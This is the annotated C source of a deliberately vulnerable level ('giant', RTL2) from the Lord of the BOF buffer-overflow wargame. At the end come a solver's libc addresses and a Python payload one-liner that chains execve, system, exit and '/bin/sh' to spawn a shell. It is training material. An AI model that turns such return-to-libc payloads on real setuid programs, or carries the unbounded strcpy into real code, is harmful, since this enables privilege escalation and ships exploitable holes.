/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Entry point of the "giant" wargame level (RTL2 — presumably a return-to-libc
 * exercise). The program is intentionally vulnerable: the unbounded strcpy()
 * below is the exercise itself, so the defects called out in the comments are
 * documented rather than patched.
 *
 * Declared without a return type (implicit int, a pre-C99 style that C99 and
 * later reject). memcpy() and strcpy() are also used without <string.h>, so
 * they rely on implicit declarations.
 */
main(int argc, char *argv[])
{
char buffer[40];            /* 40 bytes; see the fgets(..., 255, ...) and strcpy() below */
FILE *fp;
/* These hold addresses read back from text, so they are pointers even though
 * sscanf("%x") writes an unsigned int — a type mismatch that only works where
 * pointers and unsigned int have the same size (presumably a 32-bit target). */
char *lib_addr, *execve_offset, *execve_addr;
char *ret;
if(argc < 2){
printf("argv error\n");
exit(0);                    /* note: error path still exits with status 0 */
}
// Resolve execve's address at run time: libc base from ldd, execve's offset
// from nm, then base + offset. Both shell pipelines are hard-coded.
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
/* Size argument (255) exceeds sizeof buffer (40); a long ldd line would
 * overflow here. fgets(buffer, sizeof buffer, fp) is the bounded form.
 * The return value is also unchecked, so an empty pipe leaves buffer stale. */
fgets(buffer, 255, fp);
sscanf(buffer, "(%x)", &lib_addr);
fclose(fp);                 /* stream came from popen(), so pclose() is the matching call */
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
fgets(buffer, 255, fp);     /* same 255-vs-40 mismatch as above */
sscanf(buffer, "%x", &execve_offset);
fclose(fp);                 /* likewise should be pclose() */
execve_addr = lib_addr + (int)execve_offset;   /* absolute address of execve in libc */
// end of address resolution
/* Copies the 4 bytes at offset 44 of argv[1] into ret without checking that
 * argv[1] is that long; a shorter argument makes this read past its
 * terminator. Only these 4 bytes are constrained by the check below. */
memcpy(&ret, &(argv[1][44]), 4);
if(ret != execve_addr)
{
printf("You must use execve!\n");
exit(0);
}
/* The intended vulnerability: unbounded copy of argv[1] into a 40-byte
 * buffer. Any argument that passed the check above is already longer than
 * 40 bytes, so this write always overruns buffer. Bounded copying
 * (snprintf / strlcpy) or rejecting oversized input would close it. */
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
system : 0x40058ae0
exit : 0x400391e0
/bin/sh : 0x400fbff9
execve : 0x400a9d48
execve함수의 ebp에 함수를 넣는다.
payload = "`python -c 'print "\x90"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"'`"